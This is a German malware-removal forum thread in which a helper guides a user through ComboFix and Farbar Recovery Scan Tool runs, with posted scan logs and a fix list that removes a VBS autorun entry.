[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Zeit der Fertigstellung: 2014-04-23  18:39:23
ComboFix-quarantined-files.txt  2014-04-23 16:39
ComboFix2.txt  2014-04-22 21:26
ComboFix3.txt  2014-04-22 02:04
ComboFix4.txt  2014-04-20 23:42
.
Vor Suchlauf: 23 Verzeichnis(se), 31.837.204.480 Bytes frei
Nach Suchlauf: 24 Verzeichnis(se), 31.779.074.048 Bytes frei
.
- - End Of File - - B3667FAB6E80868E9703840EB333818F

habe alles so gemacht wie vorher (denke ich): das Skript in den Editor kopiert und als CFScript.txt gespreichert, dann die .txt auf combofix.exe gezogen
zur Sicherheit hänge ich mal mein CFScript an falls ich doch was falsch gemacht habe

schrauber 24.04.2014 11:31

komisch.

Scan mit Farbar's Recovery Scan Tool (Recovery Mode - Windows Vista, 7, 8)
Hinweise für Windows 8-Nutzer: Anleitung 1 (FRST-Variante) und Anleitung 2 (zweiter Teil)
  • Downloade dir bitte die passende Version des Tools (im Zweifel beide) und speichere diese auf einen USB Stick: FRST Download FRST 32-Bit | FRST 64-Bit
  • Schließe den USB Stick an das infizierte System an und boote das System in die System Reparatur Option.
  • Scanne jetzt nach der bebilderten Anleitung oder verwende die folgende Kurzanleitung:
Über den Boot Manager:
  • Starte den Rechner neu.
  • Während dem Hochfahren drücke mehrmals die F8 Taste
  • Wähle nun Computer reparieren.
  • Wähle dein Betriebssystem und Benutzerkonto und klicke jeweils "Weiter".
Mit Windows CD/DVD (auch bei Windows 8 möglich):
  • Lege die Windows CD in dein Laufwerk.
  • Starte den Rechner neu und starte von der CD.
  • Wähle die Spracheinstellungen und klicke "Weiter".
  • Klicke auf Computerreparaturoptionen !
  • Wähle dein Betriebssystem und Benutzerkonto und klicke jeweils "Weiter".
Wähle in den Reparaturoptionen: Eingabeaufforderung
  • Gib nun bitte notepad ein und drücke Enter.
  • Im öffnenden Textdokument: Datei > Speichern unter... und wähle Computer.
    Hier wird dir der Laufwerksbuchstabe deines USB Sticks angezeigt, merke ihn dir.
  • Schließe Notepad wieder
  • Gib nun bitte folgenden Befehl ein.
    e:\frst.exe bzw. e:\frst64.exe
    Hinweis: e steht für den Laufwerksbuchstaben deines USB Sticks, den du dir gemerkt hast. Gegebenfalls anpassen.
  • Akzeptiere den Disclaimer mit Ja und klicke Untersuchen
Das Tool erstellt eine FRST.txt auf deinem USB Stick. Poste den Inhalt bitte hier nach Möglichkeit in Code-Tags (Anleitung).


fxak 25.04.2014 05:56

kann FRST nicht starten, bei der 64-bit Version (mein Windows ist 64 bit) kommt frst64.exe ist keine zulässige win-32 Anwendung, bei der 32-bit Version heisst es das zum Unterstützen des Abbildtyps erforderliche Subsystem ist nicht vorhanden

schrauber 25.04.2014 19:04

Du bist aber in der Recovery?

fxak 25.04.2014 22:44

ja, habe beim Start f8 gedrückt, Computer feparieren, und dann Eingabeaufforderung, richtigen Laufwerksbuchstaben hab ich überprüft.
Kann man da irgend was falsch machen? Hab mir auch die Anleitung angeschaut, genau so hab ichs gemacht.

schrauber 26.04.2014 15:56

Den Fehler kenn ich nur wenn man in Windows ist, AV blockt dann. In der REcovery sollte der nit kommen. FRST vom Stick löschen und neu laden.

fxak 27.04.2014 22:30

Ok, jetzt hats komisherweise problemlos funktioniert.

FRST.txt:


FRST Logfile:
Code:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 27-04-2014
Ran by SYSTEM on MININT-J7V2I8A on 27-04-2014 23:15:56
Running from F:\
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Recovery

The current controlset is ControlSet001
ATTENTION!:=====> If the system is bootable FRST could be run from normal or Safe mode to create a complete log.



==================== Registry (Whitelisted) ==================

HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-22] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-19] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-19] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-08] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-08] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-04-20] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [960080 2010-05-25] (Dritek System Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe [689744 2014-02-20] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-20] (Apple Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\Default\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe /default
HKU\Default User\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe /default
HKU\Franz\...\Run: [NetLimiter] => C:\Program Files\NetLimiter 3\NLClientApp.exe [2910208 2011-03-21] (Locktime Software)
HKU\Franz\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()

==================== Services (Whitelisted) =================

S2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
S2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
S2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
S2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
S2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)

==================== Drivers (Whitelisted) ====================

S5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
S1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
S1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
S1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-04-24 20:43 - 2014-04-24 20:43 - 01048576 _____ (Farbar) C:\Users\Franz\Desktop\FRST.exe
2014-04-24 20:31 - 2014-04-27 13:10 - 02061824 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-23 08:44 - 2014-04-23 08:44 - 00000341 _____ () C:\Users\Franz\Desktop\CFScript.txt
2014-04-23 08:39 - 2014-04-23 08:39 - 00018305 _____ () C:\ComboFix.txt
2014-04-22 14:27 - 2014-04-22 14:32 - 00000000 ____D () C:\Users\Franz\Desktop\Air Niugini
2014-04-22 07:26 - 2014-04-22 07:27 - 02237968 _____ (Kaspersky Lab ZAO) C:\Users\Franz\Desktop\tdsskiller.exe
2014-04-21 18:48 - 2014-04-21 19:35 - 00000000 ____D () C:\Users\Franz\Desktop\Projekt
2014-04-21 17:28 - 2014-04-21 17:28 - 05196870 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-21 16:40 - 2014-04-24 20:49 - 00000000 ____D () C:\Program Files (x86)\Smadav
2014-04-21 16:40 - 2014-04-21 16:40 - 00003240 _____ () C:\Windows\System32\Tasks\smadav
2014-04-21 16:40 - 2014-04-21 16:40 - 00000718 _____ () C:\Users\Public\Desktop\SMADΔV.lnk
2014-04-21 16:40 - 2014-04-21 16:40 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Smadav
2014-04-19 19:20 - 2014-04-19 19:21 - 00025978 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-18 13:16 - 2013-09-22 07:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-04-18 13:13 - 2014-04-18 13:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion
2014-04-16 13:57 - 2014-04-16 13:59 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 13:46 - 2014-04-16 13:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 13:07 - 2014-04-16 13:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\MBAMSwissArmy.sys
2014-04-16 13:06 - 2014-04-16 13:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 13:06 - 2014-04-16 13:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 13:06 - 2014-04-16 13:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 13:06 - 2014-04-02 23:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mbamchameleon.sys
2014-04-16 13:06 - 2014-04-02 23:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mwac.sys
2014-04-16 13:06 - 2014-04-02 23:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mbam.sys
2014-04-15 16:56 - 2014-04-23 08:40 - 00000000 ____D () C:\Qoobox
2014-04-15 16:56 - 2014-04-15 17:35 - 00000000 ____D () C:\Windows\erdnt
2014-04-15 16:56 - 2011-06-25 22:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-04-15 16:56 - 2010-11-07 09:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-04-15 16:56 - 2009-04-19 20:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-04-15 16:56 - 2000-08-30 16:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-04-15 16:56 - 2000-08-30 16:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-04-15 16:56 - 2000-08-30 16:00 - 00098816 _____ () C:\Windows\sed.exe
2014-04-15 16:56 - 2000-08-30 16:00 - 00080412 _____ () C:\Windows\grep.exe
2014-04-15 16:56 - 2000-08-30 16:00 - 00068096 _____ () C:\Windows\zip.exe
2014-04-15 16:52 - 2014-04-15 16:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-15 16:52 - 2014-04-15 16:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-15 16:50 - 2014-04-15 16:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-14 01:21 - 2008-03-21 18:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi
2014-04-14 01:19 - 2010-01-05 06:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi
2014-04-14 00:43 - 2014-04-27 23:15 - 00000000 ____D () C:\FRST
2014-04-10 19:39 - 2014-03-04 04:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-06 23:32 - 2014-04-27 13:07 - 00000000 ____D () C:\[Smad-Cage]
2014-04-06 23:30 - 2014-04-06 23:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 00:10 - 2014-04-21 16:27 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-01 22:42 - 2014-04-16 12:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-01 22:27 - 2014-04-01 22:27 - 00000000 ____D () C:\Windows\pss
2014-04-01 22:19 - 2014-04-01 22:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-01 22:19 - 2014-04-01 22:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-01 20:29 - 2013-02-01 00:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-01 20:15 - 2013-03-02 20:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv

==================== One Month Modified Files and Folders =======

2014-04-27 23:15 - 2014-04-14 00:43 - 00000000 ____D () C:\FRST
2014-04-27 13:12 - 2013-04-16 09:13 - 01998174 _____ () C:\Windows\WindowsUpdate.log
2014-04-27 13:12 - 2009-07-13 21:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-27 13:12 - 2009-07-13 20:51 - 00089296 _____ () C:\Windows\setupact.log
2014-04-27 13:12 - 2009-07-13 20:45 - 00022672 ____H () C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-27 13:12 - 2009-07-13 20:45 - 00022672 ____H () C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-27 13:10 - 2014-04-24 20:31 - 02061824 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-27 13:07 - 2014-04-06 23:32 - 00000000 ____D () C:\[Smad-Cage]
2014-04-27 13:06 - 2013-04-16 10:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-27 12:51 - 2013-04-16 10:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-27 12:51 - 2013-04-16 10:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-24 20:49 - 2014-04-21 16:40 - 00000000 ____D () C:\Program Files (x86)\Smadav
2014-04-24 20:43 - 2014-04-24 20:43 - 01048576 _____ (Farbar) C:\Users\Franz\Desktop\FRST.exe
2014-04-24 20:39 - 2010-05-10 15:15 - 00116164 _____ () C:\Windows\PFRO.log
2014-04-23 08:44 - 2014-04-23 08:44 - 00000341 _____ () C:\Users\Franz\Desktop\CFScript.txt
2014-04-23 08:40 - 2014-04-15 16:56 - 00000000 ____D () C:\Qoobox
2014-04-23 08:39 - 2014-04-23 08:39 - 00018305 _____ () C:\ComboFix.txt
2014-04-23 08:16 - 2009-07-13 18:34 - 00000215 _____ () C:\Windows\system.ini
2014-04-23 08:00 - 2013-04-16 10:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-04-22 14:32 - 2014-04-22 14:27 - 00000000 ____D () C:\Users\Franz\Desktop\Air Niugini
2014-04-22 07:27 - 2014-04-22 07:26 - 02237968 _____ (Kaspersky Lab ZAO) C:\Users\Franz\Desktop\tdsskiller.exe
2014-04-21 19:35 - 2014-04-21 18:48 - 00000000 ____D () C:\Users\Franz\Desktop\Projekt
2014-04-21 17:28 - 2014-04-21 17:28 - 05196870 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe
2014-04-21 16:40 - 2014-04-21 16:40 - 00003240 _____ () C:\Windows\System32\Tasks\smadav
2014-04-21 16:40 - 2014-04-21 16:40 - 00000718 _____ () C:\Users\Public\Desktop\SMADΔV.lnk
2014-04-21 16:40 - 2014-04-21 16:40 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Smadav
2014-04-21 16:27 - 2014-04-03 00:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-19 19:21 - 2014-04-19 19:20 - 00025978 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-19 18:46 - 2013-04-16 19:01 - 00696870 _____ () C:\Windows\System32\perfh007.dat
2014-04-19 18:46 - 2013-04-16 19:01 - 00148134 _____ () C:\Windows\System32\perfc007.dat
2014-04-19 18:46 - 2009-07-13 21:13 - 01612484 _____ () C:\Windows\System32\PerfStringBackup.INI
2014-04-18 17:21 - 2013-04-16 10:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-18 13:13 - 2014-04-18 13:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion
2014-04-16 14:00 - 2014-03-11 07:56 - 00000000 ____D () C:\AdwCleaner
2014-04-16 13:59 - 2014-04-16 13:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt
2014-04-16 13:46 - 2014-04-16 13:46 - 00000000 ____D () C:\Windows\ERUNT
2014-04-16 13:10 - 2014-04-16 13:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\MBAMSwissArmy.sys
2014-04-16 13:06 - 2014-04-16 13:06 - 00001106 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-04-16 13:06 - 2014-04-16 13:06 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-04-16 13:06 - 2014-04-16 13:06 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-04-16 12:12 - 2014-04-01 22:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-15 17:43 - 2009-07-13 19:20 - 00000000 __RHD () C:\users\Default
2014-04-15 17:35 - 2014-04-15 16:56 - 00000000 ____D () C:\Windows\erdnt
2014-04-15 16:52 - 2014-04-15 16:52 - 00000000 ____D () C:\ProgramData\Panda Security
2014-04-15 16:52 - 2014-04-15 16:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine
2014-04-15 16:50 - 2014-04-15 16:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine
2014-04-14 00:20 - 2013-04-16 11:29 - 00000000 ____D () C:\Setups
2014-04-06 23:30 - 2014-04-06 23:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-05 22:23 - 2013-04-16 10:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-05 22:23 - 2013-04-16 10:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-02 23:51 - 2014-04-16 13:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mbamchameleon.sys
2014-04-02 23:51 - 2014-04-16 13:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mwac.sys
2014-04-02 23:50 - 2014-04-16 13:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\System32\Drivers\mbam.sys
2014-04-01 22:54 - 2014-04-01 22:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-01 22:27 - 2014-04-01 22:27 - 00000000 ____D () C:\Windows\pss
2014-04-01 22:25 - 2013-04-16 10:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-01 22:24 - 2013-04-16 10:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-01 22:19 - 2014-04-01 22:19 - 00000000 ____D () C:\ProgramData\Norton
2014-03-30 18:12 - 2014-02-28 03:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos

Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\avgnt.exe


==================== Known DLLs (Whitelisted) ================


==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

==================== EXE ASSOCIATION =====================

HKLM\...\.exe: exefile => OK
HKLM\...\exefile\DefaultIcon: %1 => OK
HKLM\...\exefile\open\command: "%1" %* => OK

==================== Restore Points  =========================

Restore point made on: 2014-03-04 04:16:53
Restore point made on: 2014-03-13 18:01:05
Restore point made on: 2014-03-23 14:56:49
Restore point made on: 2014-04-01 23:56:23
Restore point made on: 2014-04-02 04:47:26
Restore point made on: 2014-04-15 16:57:13
Restore point made on: 2014-04-20 15:04:46
Restore point made on: 2014-04-21 17:31:02

==================== Memory info ===========================

Percentage of memory in use: 19%
Total physical RAM: 3764.43 MB
Available physical RAM: 3044.73 MB
Total Pagefile: 3762.57 MB
Available Pagefile: 3035.25 MB
Total Virtual: 8192 MB
Available Virtual: 8191.91 MB

==================== Drives ================================

Drive c: (ACER) (Fixed) (Total:452.97 GB) (Free:29.71 GB) NTFS
Drive e: (PQSERVICE) (Fixed) (Total:12.7 GB) (Free:2.56 GB) NTFS
Drive f: () (Removable) (Total:14.63 GB) (Free:14.62 GB) FAT32
Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
Drive y: (SYSTEM RESERVED) (Fixed) (Total:0.1 GB) (Free:0.07 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 466 GB) (Disk ID: 59D459D4)
Partition 1: (Not Active) - (Size=13 GB) - (Type=27)
Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=453 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 15 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=15 GB) - (Type=0C)


LastRegBack: 2014-03-23 14:49

==================== End Of Log ============================

--- --- ---

schrauber 28.04.2014 09:15

Drücke bitte die + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:

HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKU\Franz\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
2014-04-18 13:16 - 2013-09-22 07:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs

Speichere diese bitte als Fixlist.txt auf deinem USB Stick.
  • Starte deinen Rechner erneut in die Reparaturoptionen
  • Starte nun die FRST.exe erneut und klicke den Entfernen Button.

Das Tool erstellt eine Fixlog.txt auf deinem USB Stick. Poste den Inhalt bitte hier.



Frisches Scanlog aus der recovery bitte.

fxak 28.04.2014 22:20

Fixlog.txt:

Code:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 27-04-2014
Ran by SYSTEM at 2014-04-28 22:48:01 Run:2
Running from F:\
Boot Mode: Recovery
==============================================

Content of fixlist:
*****************
HKLM\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
HKU\Franz\...\Run: [wtbchkxbde] => wscript.exe //B "C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs" <===== ATTENTION
Startup: C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs ()
2014-04-18 13:16 - 2013-09-22 07:47 - 00073266 _____ () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
HKU\Franz\Software\Microsoft\Windows\CurrentVersion\Run\\wtbchkxbde => Value deleted successfully.
C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs => Moved successfully.
C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs => Moved successfully.

==== End of Fixlog ====


FRST Logfile:
Code:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 27-04-2014
Ran by SYSTEM on MININT-FS42655 on 28-04-2014 22:48:15
Running from F:\
Windows 7 Home Premium (X64) OS Language: German Standard
Internet Explorer Version 9
Boot Mode: Recovery

The current controlset is ControlSet001
ATTENTION!:=====> If the system is bootable FRST could be run from normal or Safe mode to create a complete log.




==================== Registry (Whitelisted) ==================

HKLM\...\Run: [AmIcoSinglun64] => C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [323584 2009-09-22] (Alcor Micro Corp.)
HKLM\...\Run: [mwlDaemon] => C:\Program Files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [9996320 2010-01-19] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [877600 2010-01-19] (Realtek Semiconductor)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [585376 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [354464 2010-05-25] (Atheros Commnucations)
HKLM\...\Run: [Apoint] => C:\Program Files\Apoint2K\Apoint.exe [345648 2010-03-08] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Acer ePower Management] => C:\Program Files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe [496160 2010-02-02] (Acer Incorporated)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [BackupManagerTray] => C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [260608 2010-03-08] (NewTech Infosystems, Inc.)
